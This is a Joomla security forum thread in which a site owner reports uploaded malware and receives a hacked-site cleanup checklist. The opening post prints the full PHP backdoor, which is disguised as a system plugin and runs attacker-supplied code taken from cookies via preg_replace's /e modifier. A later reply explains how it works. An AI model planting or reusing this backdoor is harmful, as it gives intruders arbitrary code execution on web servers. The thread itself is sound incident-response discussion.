virus files uploaded

Discussion regarding Joomla! 2.5 security issues.

Moderators: mandville, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Locked
mdem
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Jan 28, 2008 9:59 am

virus files uploaded

Post by mdem » Sun May 25, 2014 9:05 pm

Hello,

i have found out, that there was an upload of files to my joomla site into the folder components.
One file was called: a.php
The code inside is:

Code: Select all

<?php
/**
 * @package     Joomla.Plugin.System
 * @since       1.5
 *
 *
 */
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE['Jlma3'];
if ($file){ $opt=$file(@$_COOKIE['Jlma2']); $au=$file(@$_COOKIE['[removed]']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
$index=new PlgSysJoomla;
what has happened?
I deleted the file and changed the passwords.
What should i do next?
I am using already admin tools with admin password.

Shared hosting.
Joomla! 2.5.20 Stable [ Ember ] 30-April-2014 14:00 GMT
PHP-Version 5.3.28
Webserver Apache/2.2.27 (Unix)
Top
User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: virus files uploaded

Post by mandville » Sun May 25, 2014 9:39 pm

Please run the FPA
And post the http://forum.joomla.org/viewtopic.php?f=621&t=582860 result
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Top
mdem
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Jan 28, 2008 9:59 am

Re: virus files uploaded

Post by mdem » Sun May 25, 2014 9:41 pm

What means FPA

excuse me, i am from Germany
Top
User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: virus files uploaded

Post by mandville » Sun May 25, 2014 10:20 pm


Before you post your security/been hacked topic, it is suggested to do all of the following. Failure to follow the suggestions below may leave your site vulnerable to being hacked again in the future.

You must state what version of Joomla you were using when the site first became hacked. This can make a difference as to how we approach your individual situation.

[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic. Use these links to download the FPA:
Download .tar.gz version or Download the .zip version NOTE: Do not download the FPA from any other website or links found on the Internet.

[ ] Ensure you have the latest version of Joomla for your version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files by

[*]Create a new database and install without sample data to it(make sure it the same version as previous site).
[*] Install the 3rd party extensions(including any custom template) to the new Joomla. (That insures you have the files in place for the 3rd party extensions)
[*] Edit the configuration.php file of the new Joomla to connect to your original database.
[*] Make a backup and update to the current full version of Joomla

Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the Security Checklist 7 document.

Note: The forum post tool will work with all versions of Joomla. The FPA is written and maintained by the Joomla Security forum moderators.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Top
mdem
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Jan 28, 2008 9:59 am

Re: virus files uploaded

Post by mdem » Mon May 26, 2014 9:25 pm

Problem Description :: Forum Post Assistant (v1.2.4) : 26th May 2014 wrote:upload of virus files
Forum Post Assistant (v1.2.4) : 26th May 2014 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.20-Stable (Ember) 30-April-2014
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: u439***** (uid: 1/gid: 1) | Group: ftpusers (gid: 1) | Valid For: 2.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: none | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux | OS Version: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux | Technology: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /kunden/homepages/27/d193561584/htdocs | System TMP Writable: Yes

PHP Configuration :: Version: 5.4.28 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 22517 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 40M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 50000 | Memory Limit: 120M

MySQL Configuration :: Version: 5.1.73-log (Client:5.1.73) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 1.60 MiB | #of Tables:  165
Detailed Environment :: wrote:PHP Extensions :: Core (5.4.28) | date (5.4.28) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | bz2 () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | intl (1.1.0) | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | standard (5.4.28) | pdo_sqlite (1.0.1) | Phar (2.0.1) | posix () | Reflection ($Id: f6367cdb4e3f392af4a6d441a6641de87c2e50c4 $) | imap () | shmop () | SimpleXML (0.1) | soap () | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: c85105d7c6f7d70d609bb4c000257868a40840ab $) | SQLite (2.0-dev) | exif (1.4 $Id$) | tidy (2.0) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | pdo_mysql (1.0.2) | cgi-fcgi () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: logs/forensic/ (757) |
Extensions Discovered :: wrote:Components :: SITE :: com_mailto (2.5.0) | com_wrapper (2.5.0) | WF_AGGREGATOR_VIMEO_TITLE (2.3.4.4) | WF_AGGREGATOR_[youtube]_TITLE (2.3.4.4) | WF_AGGREGATOR_GOOGLEMAPS_TITLE (2.3.4.4) | WF_AGGREGATOR_VINE_TITLE (2.3.4.4) | WF_FILESYSTEM_JOOMLA_TITLE (2.3.4.4) | WF_LINKS_JOOMLALINKS_TITLE (2.3.4.4) | K2 Links for JCE Link (2.2) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.3.4.4) | WF_POPUPS_JCEMEDIABOX_TITLE (2.3.4.4) | WF_POPUPS_WINDOW_TITLE (2.3.4.4) | WF_LINK_SEARCH_TITLE (2.3.4.4) | WF_ARTICLE_TITLE (2.3.4.4) | WF_AUTOSAVE_TITLE (2.3.4.4) | WF_BROWSER_TITLE (2.3.4.4) | WF_CLEANUP_TITLE (2.3.4.4) | WF_CONTEXTMENU_TITLE (2.3.4.4) | WF_DIRECTIONALITY_TITLE (2.3.4.4) | WF_FULLSCREEN_TITLE (2.3.4.4) | WF_IMGMANAGER_TITLE (2.3.4.4) | WF_INLINEPOPUPS_TITLE (2.3.4.4) | WF_LAYER_TITLE (2.3.4.4) | WF_LINK_TITLE (2.3.4.4) | WF_LISTS_TITLE (2.3.4.4) | WF_MEDIA_TITLE (2.3.4.4) | WF_NONBREAKING_TITLE (2.3.4.4) | WF_PREVIEW_TITLE (2.3.4.4) | WF_PRINT_TITLE (2.3.4.4) | WF_SEARCHREPLACE_TITLE (2.3.4.4) | WF_SOURCE_TITLE (2.3.4.4) | WF_SPELLCHECKER_TITLE (2.3.4.4) | WF_STYLE_TITLE (2.3.4.4) | WF_TABLE_TITLE (2.3.4.4) | WF_TEXTCASE_TITLE (2.3.4.4) | WF_VISUALCHARS_TITLE (2.3.4.4) | WF_XHTMLXTRAS_TITLE (2.3.4.4) | WF_IMGMANAGER_EXT_TITLE (2.0.24) | WF_MEDIAMANAGER_TITLE (2.0.13) | WF_FILEMANAGER_TITLE (2.1.7) | WF_CAPTION_TITLE (2.1.7) | WF_ANCHOR_TITLE (2.3.4.4) | WF_VISUALBLOCKS_TITLE (2.3.4.4) | WF_KITCHENSINK_TITLE (2.3.4.4) | WF_CLIPBOARD_TITLE (2.3.4.4) | WF_CHARMAP_TITLE (2.3.4.4) |
Components :: ADMIN :: com_config (2.5.0) | com_menus (2.5.0) | com_content (2.5.0) | com_admin (2.5.0) | com_cpanel (2.5.0) | com_banners (2.5.0) | com_messages (2.5.0) | com_modules (2.5.0) | com_newsfeeds (2.5.0) | com_categories (2.5.0) | com_search (2.5.0) | com_login (2.5.0) | com_plugins (2.5.0) | com_media (2.5.0) | com_weblinks (2.5.0) | com_cache (2.5.0) | com_templates (2.5.0) | com_installer (2.5.0) | com_checkin (2.5.0) | com_redirect (2.5.0) | com_users (2.5.0) | com_languages (2.5.0) | Unknown (-) | JCE (2.3.4.4) | Akeeba (3.10.2) | Admintools (2.6.2) | AcyMailing Module (3.7.0) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Manage text (1.0.0) | AcyMailing Tag : Website links (3.7.0) | AcyMailing : share on social n (1.0.0) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing table of contents g (1.0.0) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing Tag : content inser (3.7.0) | AcyMailing Tag : Subscriber in (4.6.2) | AcyMailing Tag : Manage the Su (4.6.2) | AcyMailing Tag : Date / Time (4.6.2) | AcyMailing Tag : Joomla User I (4.6.2) | AcyMailing Template Class Repl (4.6.2) | AcyMailing : (auto)Subscribe d (4.6.2) | AcyMailing Editor (beta) (4.6.2) | AcyMailing (4.6.2) | com_finder (2.5.0) | com_joomlaupdate (2.5.0) | com_xmap (2.3.4) |

Modules :: SITE :: mod_custom (2.5.0) | mod_banners (2.5.0) | mod_weblinks (2.5.0) | mod_wrapper (2.5.0) | mod_stats (2.5.0) | mod_footer (2.5.0) | mod_languages (2.5.0) | mod_syndicate (2.5.0) | mod_search (2.5.0) | mod_articles_categories (2.5.0) | mod_articles_news (2.5.0) | mod_login (2.5.0) | mod_articles_latest (2.5.0) | mod_articles_category (2.5.0) | mod_random_image (2.5.0) | mod_articles_archive (2.5.0) | mod_users_latest (2.5.0) | mod_whosonline (2.5.0) | mod_related_items (2.5.0) | mod_articles_popular (2.5.0) | mod_breadcrumbs (2.5.0) | mod_feed (2.5.0) | mod_menu (2.5.0) | AcyMailing Module (3.7.0) | mod_finder (2.5.0) |
Modules :: ADMIN :: mod_custom (2.5.0) | mod_login (2.5.0) | mod_unread (1.6.0) | mod_title (2.5.0) | mod_toolbar (2.5.0) | mod_submenu (2.5.0) | mod_logged (2.5.0) | mod_status (2.5.0) | mod_online (1.6.0) | mod_quickicon (2.5.0) | mod_latest (2.5.0) | mod_popular (2.5.0) | mod_feed (2.5.0) | mod_menu (2.5.0) | mod_multilangstatus (2.5.0) | mod_version (2.5.0) |

Plugins :: SITE :: plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_authentication_gmail (2.5.0) | plg_editors-xtd_image (2.5.0) | plg_editors-xtd_article (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | PLG_EDITORS-XTD_TABBER (1.5.2) | plg_user_profile (2.5.0) | plg_user_joomla (2.5.0) | plg_user_contactcreator (2.5.0) | plg_content_pagenavigation (2.5.0) | plg_content_emailcloak (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_geshi (2.5.0) | plg_content_joomla (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_vote (2.5.0) | plg_content_finder (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_categories (2.5.0) | plg_search_content (2.5.0) | plg_search_contacts (2.5.0) | plg_search_weblinks (2.5.0) | plg_system_debug (2.5.0) | plg_system_remember (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_sef (2.5.0) | plg_system_p3p (2.5.0) | plg_system_cache (2.5.0) | plg_system_logout (2.5.0) | plg_system_redirect (2.5.0) | plg_system_log (2.5.0) | System - Admin Tools (2.6.2) | System - JCE MediaBox (1.1.16) | AcyMailing : (auto)Subscribe d (4.6.2) | Google Maps (2.18) | PLG_SYSTEM_TABBER (1.5.2) | PLG_SYSTEM_NONUMBERELEMENTS (2.8.1) | plg_system_highlight (2.5.0) | plg_system_languagecode (2.5.0) | plg_extension_joomla (2.5.0) | plg_editors_tinymce (3.5.4.1) | plg_editors_codemirror (1.0) | plg_editors_jce (2.3.4.4) | AcyMailing Editor (beta) (4.6.2) | AcyMailing : trigger Joomla Co (3.7.0) | AcyMailing Manage text (1.0.0) | AcyMailing Tag : Website links (3.7.0) | AcyMailing : share on social n (1.0.0) | AcyMailing : Statistics Plugin (3.7.0) | AcyMailing table of contents g (1.0.0) | AcyMailing Tag : CB User infor (3.7.0) | AcyMailing Tag : content inser (3.7.0) | AcyMailing Tag : Subscriber in (4.6.2) | AcyMailing Tag : Manage the Su (4.6.2) | AcyMailing Tag : Date / Time (4.6.2) | AcyMailing Tag : Joomla User I (4.6.2) | AcyMailing Template Class Repl (4.6.2) | plg_captcha_recaptcha (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_content (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_weblinks (2.5.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_quickicon_jcefilebrowser (2.3.4.4) | PLG_JMONITORING_AKEEBABACKUP_T (1.0) | Xmap - Content Plugin (2.0.4) | Xmap - Kunena Plugin (3.0.0) | Xmap - SobiPro Plugin (2.0.2) | Xmap - Mosets Tree Plugin (2.0.2) | Xmap - Virtuemart Plugin (2.0.3) | Xmap - WebLinks Plugin (2.0.1) | XMAP_PLUGIN_K2 (1.3) |
Templates Discovered :: wrote:Templates :: SITE :: atomic (2.5.0) | beez_20 (2.5.0) | beez5 (2.5.0) | brokers (Latest_modded) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
Top
enone
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu May 29, 2014 8:09 pm

Re: virus files uploaded

Post by enone » Thu May 29, 2014 8:12 pm

Same things appen to me! possible 0day hack? that no one yet know?
Top
User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: virus files uploaded

Post by mandville » Thu May 29, 2014 8:43 pm

why?
Elevated Permissions (First 10) :: logs/forensic/ (757) |
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Top
mdem
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Jan 28, 2008 9:59 am

Re: virus files uploaded

Post by mdem » Fri May 30, 2014 2:34 pm

Hello,

i found out, that i had the "no number framework" installed and not updated.
I have two other joomlas running with exactly the same problem.

I hope, after cleaning them from the framework, they are safe from hacking attempts.

Thanks for support so far.

Maurizio
Top
User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:
Contact leolam

Re: virus files uploaded

Post by leolam » Sat May 31, 2014 2:38 am

Why? most extensions outdated. You ask for trouble of you do not upgrade

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
Top
mdem
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Jan 28, 2008 9:59 am

Re: virus files uploaded

Post by mdem » Sat May 31, 2014 11:52 am

As far as i can see, all extensions i use are now updated, so far as they are provided.

The nonumber framework with the plugins tabs and slides wasn´t focussed by me. A mistake.

What i learned now is, to look realy close to all axtensions, plugins and tools.

Thx for your advice.
Top
User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: virus files uploaded

Post by mandville » Sat May 31, 2014 12:05 pm

Did you follow checklist 7 or just update ?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Top
mdem
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Jan 28, 2008 9:59 am

Re: virus files uploaded

Post by mdem » Sat May 31, 2014 12:12 pm

i am working on it.

Still busy ....
Top
vijaycs85
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu Nov 06, 2014 12:23 am

Re: virus files uploaded

Post by vijaycs85 » Thu Nov 06, 2014 12:35 am

Just want to inform that the script hacker used is, to execute php code using preg_replace function:

Code: Select all

$opt("/292/e",$au,292);
is approximately equalent to

Code: Select all

preg_replace("/292/e","[PHP code]",292);
php version < 5.5.0 has 'e' modifier which allows to evaluate the replaced string as php code.

In summary, the code gives option to execute any php script (with eval() function, any system command) on the server.
Top
User avatar
Slackervaara
Joomla! Ace
Joomla! Ace
Posts: 1115
Joined: Sat Aug 13, 2011 6:27 am

Re: virus files uploaded

Post by Slackervaara » Mon Nov 17, 2014 6:22 pm

The free security plugin JHackguard has an option to disable file upload by guests and I uses that option.

http://www.siteground.com/joomla-hostin ... /jhack.htm
Top
User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44089
Joined: Sat Apr 05, 2008 9:58 pm

Re: virus files uploaded

Post by Webdongle » Mon Nov 17, 2014 6:42 pm

vijaycs85 wrote:Just want to inform that the script hacker used is, to execute php code using preg_replace function:...
There are many scripts but that is not the point.

What matters is
  • How did the hacker gain access to the server to run the script ?
  • Were all the files deleted and replaced with fresh ones or were the extensions just updated ?
  • Were all computers with server(or admin) access scecked for viruses ?
  • Was everything on http://forum.joomla.org/viewtopic.php?f=621&t=582854 followed in the correct order ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
Top
User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: virus files uploaded

Post by mandville » Mon Nov 17, 2014 7:40 pm

Slackervaara wrote:The free security plugin JHackguard
and last we knew placed backlinks all over your site
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Top
User avatar
Slackervaara
Joomla! Ace
Joomla! Ace
Posts: 1115
Joined: Sat Aug 13, 2011 6:27 am

Re: virus files uploaded

Post by Slackervaara » Mon Nov 17, 2014 8:43 pm

In 2.5 version that I am using you can turn backlinks off and it is just one click on a button.
Top
Locked

Return to “Security in Joomla! 2.5”